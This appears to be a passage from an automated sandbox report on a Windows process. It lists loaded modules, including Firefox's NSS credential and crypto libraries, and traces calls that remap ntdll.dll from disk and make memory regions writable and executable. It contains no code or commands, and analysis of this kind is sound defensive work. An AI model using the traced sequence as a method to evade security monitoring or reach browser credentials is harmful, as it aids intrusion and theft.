0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1835 start_va = 0x754d0000 end_va = 0x7556ffff entry_point = 0x754d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1836 start_va = 0x768f0000 end_va = 0x76908fff entry_point = 0x768f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1837 start_va = 0x62940000 end_va 
= 0x62af4fff entry_point = 0x62940000 region_type = mapped_file name = "nss3.dll" filename = "\\Program Files\\Mozilla Firefox\\nss3.dll" (normalized: "c:\\program files\\mozilla firefox\\nss3.dll") Region: id = 1838 start_va = 0x6e510000 end_va = 0x6e541fff entry_point = 0x6e510000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1839 start_va = 0x720d0000 end_va = 0x72138fff entry_point = 0x720d0000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Program Files\\Mozilla Firefox\\msvcp100.dll" (normalized: "c:\\program files\\mozilla firefox\\msvcp100.dll") Region: id = 1840 start_va = 0x72140000 end_va = 0x72161fff entry_point = 0x72140000 region_type = mapped_file name = "mozglue.dll" filename = "\\Program Files\\Mozilla Firefox\\mozglue.dll" (normalized: "c:\\program files\\mozilla firefox\\mozglue.dll") Region: id = 1841 start_va = 0x72170000 end_va = 0x72176fff entry_point = 0x72170000 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll") Region: id = 1842 start_va = 0x1140000 end_va = 0x123ffff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 1843 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1844 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1845 start_va = 0x1f00000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1846 start_va = 0x2000000 end_va = 0x22cefff entry_point = 0x2000000 
region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1847 start_va = 0x6f1f0000 end_va = 0x6f216fff entry_point = 0x6f1f0000 region_type = mapped_file name = "softokn3.dll" filename = "\\Program Files\\Mozilla Firefox\\softokn3.dll" (normalized: "c:\\program files\\mozilla firefox\\softokn3.dll") Region: id = 1848 start_va = 0x71fe0000 end_va = 0x71ff6fff entry_point = 0x71fe0000 region_type = mapped_file name = "nssdbm3.dll" filename = "\\Program Files\\Mozilla Firefox\\nssdbm3.dll" (normalized: "c:\\program files\\mozilla firefox\\nssdbm3.dll") Region: id = 1849 start_va = 0xda0000 end_va = 0xda6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000da0000" filename = "" Region: id = 1850 start_va = 0xdb0000 end_va = 0xdb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 1851 start_va = 0x22d0000 end_va = 0x26c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022d0000" filename = "" Region: id = 1852 start_va = 0x6f0f0000 end_va = 0x6f13efff entry_point = 0x6f0f0000 region_type = mapped_file name = "freebl3.dll" filename = "\\Program Files\\Mozilla Firefox\\freebl3.dll" (normalized: "c:\\program files\\mozilla firefox\\freebl3.dll") Region: id = 1853 start_va = 0x75810000 end_va = 0x76459fff entry_point = 0x75810000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1854 start_va = 0x77120000 end_va = 0x77176fff entry_point = 0x77120000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1855 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = 
"cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Thread: id = 129 os_tid = 0xce8 [0109.227] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1efdd4 | out: HeapArray=0x1efdd4*=0xdf0000) returned 0x4 [0109.232] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0x1efae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.234] NtCreateFile (in: FileHandle=0x1efb00, DesiredAccess=0x1200a0, ObjectAttributes=0x1efac8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1efae8, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1efb00*=0x30, IoStatusBlock=0x1efae8*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0109.241] NtCreateSection (in: SectionHandle=0x1efa68, DesiredAccess=0xf, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x10, AllocationAttributes=0x1000000, FileHandle=0x30 | out: SectionHandle=0x1efa68*=0x34) returned 0x0 [0109.244] NtMapViewOfSection (in: SectionHandle=0x34, ProcessHandle=0xffffffff, BaseAddress=0x1efa64*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x1efa60*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x1efa64*=0xf40000, SectionOffset=0x0, ViewSize=0x1efa60*=0x13c000) returned 0x40000003 [0109.246] NtClose (Handle=0x30) returned 0x0 [0109.246] NtClose (Handle=0x34) returned 0x0 [0109.248] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb18*=0xf40000, NumberOfBytesToProtect=0x1efb28, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb18*=0xf40000, NumberOfBytesToProtect=0x1efb28, 
OldAccessProtection=0x1efb14*=0x2) returned 0x0 [0109.248] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0xf41000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0xf41000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x20) returned 0x0 [0109.250] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1016000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1016000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x20) returned 0x0 [0109.250] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1017000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1017000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x8) returned 0x0 [0109.250] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1020000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1020000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x2) returned 0x0 [0109.251] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x1efb0c*=0x1077000, NumberOfBytesToProtect=0x1efb10, NewAccessProtection=0x40, OldAccessProtection=0x1efb14 | out: BaseAddress=0x1efb0c*=0x1077000, NumberOfBytesToProtect=0x1efb10, OldAccessProtection=0x1efb14*=0x2) returned 0x0